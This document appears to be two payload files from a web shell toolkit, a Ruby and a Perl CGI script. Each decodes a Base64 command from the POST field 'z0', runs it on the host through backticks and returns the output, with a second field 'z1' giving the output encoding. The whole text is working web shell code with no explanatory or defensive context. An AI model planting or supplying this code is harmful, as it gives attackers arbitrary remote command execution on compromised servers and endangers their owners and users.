File: Payload/Ruby/CGI/OneShell/shell_exec.rb
# $_POST: global variable used by the Ruby loader

require 'base64'

sz_command = Base64.decode64($_POST['z0'].to_s)
sz_encoding = Base64.decode64($_POST['z1'].to_s).strip

begin
  output = `#{sz_command}`
  n_ret_val = $?.exitstatus

  if n_ret_val == 0
    begin
      print output.encode('UTF-8', sz_encoding)
    rescue => e
      print output.force_encoding('UTF-8')
    end
  else
    print "ret=#{n_ret_val}"
  end
rescue => e
  print "ret=1"
end

File: Payload/Perl/CGI/OneShell/shell_exec.pl
use strict;
use warnings;
use CGI;
use MIME::Base64;
use Encode qw(from_to);

my $q = CGI->new;

my $z0 = $q->param('z0') // '';
my $z1 = $q->param('z1') // '';

my $szCommand  = decode_base64($z0);
my $szEncoding = decode_base64($z1);

if ($szCommand) {
    my @aOutput = `$szCommand 2>&1`;
    my $nRetVal = $? >> 8;

    if ($nRetVal == 0) {
        foreach my $szLine (@aOutput) {
            if ($szEncoding && $szEncoding !~ /^utf-?8$/i) {
                eval { from_to($szLine, $szEncoding, 'utf-8') };
            }
            print $szLine;
        }
    } else {
        print "ret=$nRetVal";
    }
} else {
    print "No command provided.";
}